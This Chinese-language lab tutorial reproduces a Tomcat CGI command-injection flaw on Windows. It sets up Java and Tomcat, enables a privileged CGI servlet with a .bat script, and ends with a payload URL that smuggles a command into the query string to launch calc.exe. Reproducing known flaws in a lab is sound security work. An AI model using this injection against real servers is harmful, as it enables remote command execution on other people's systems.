新建变量名为JAVA_HOME的变量变量值为你安装jdk的路径

例：变量名:JAVA_HOME变量值:C:\Program Files (x86)\Java\jdk1.8.0_73

新建变量名为JRE_HOME的变量变量值为你安装jdk文件夹中jre文件夹的路径

例：变量名JRE_HOME变量值: C:\Program Files (x86)\Java\jdk1.8.0_73\jre

新建变量名为CLASSPATH的变量变量值为.

;%JAVA_HOME%\lib;%JAVA_HOME%\lib\tools.jar(ps:前面有个点)

在变量path新增变量值为;%JAVA_HOME%\bin;%JAVA_HOME%\jre\bin(ps:前面有;)

配好变量后打开cmd命令框输入java –version出现java版本号等信息则说明变量安装成功。

如图：

2.安装tomcat  这里我用的是 apache - tomcat - 19.0.3

https://archive.apache.org/dist/tomcat/ 该链接为tomcat各个版本下载链接

安装完成之后，cmd 启动 tomcat

 打开浏览器访问正常，说明tomcat安装完毕。

3.修改配置文件

  （1）apache-tomcat-9.0.13\conf\web.xml  该文件

   需要取消掉注释的一共是俩部分，并且将下图框中内容插入

（2）conf/context.xml  中的<Context>添加privileged="true"语句 如下图

（3）在C:\Users\lenovo\Desktop\apache-tomcat-9.0.13\apache-tomcat-9.0.13\webapps\ROOT\WEB-INF

下创建一个cgi-bin文件夹，并在文件夹内创建一个bat文件可以什么都不写或者写一些bat语句。

一切准备完成。

3.重启tomacat。

4.利用payload为：

http://localhost:8080/cgi-bin/hello.bat?&C:\Windows\System32\calc.exe

该payload为打开计算器，访问之后成功打开计算器。

复现成功。